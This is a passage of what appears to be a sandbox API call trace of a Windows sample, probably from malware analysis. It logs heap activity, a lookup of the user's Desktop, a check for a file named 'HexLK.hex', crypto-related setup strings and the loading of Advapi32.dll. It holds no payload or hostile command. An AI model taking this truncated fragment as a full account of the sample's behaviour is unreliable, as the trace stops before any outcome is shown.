returned 0x2e53890 [0180.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0180.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0180.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0180.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0180.311] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0180.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0180.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0180.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0180.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0180.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0180.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0180.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0180.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0180.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e538c0 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0180.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0180.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0180.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0180.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0180.313] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0180.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0180.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0180.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0180.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0180.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0180.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0180.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0180.314] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0180.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0180.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0180.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0180.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0180.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0180.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0180.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0180.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0180.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0180.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0180.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0180.315] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0180.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0180.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0180.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0180.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0180.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0180.316] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0180.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0180.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0180.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0180.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0180.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0180.316] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexLK.hex", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3faede2, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd3faede2, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3ffc408, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xc4066, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="HexLK.hex", cAlternateFileName="")) returned 0xa874d0 [0180.317] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0180.317] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0180.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0180.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0180.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0180.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0180.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0180.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0180.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0180.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0180.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0180.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0180.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0180.318] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0180.318] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0180.318] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0180.318] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0180.318] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0180.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0180.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0180.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0180.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0180.319] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0180.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0180.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0180.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0180.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0180.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0180.319] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0180.320] 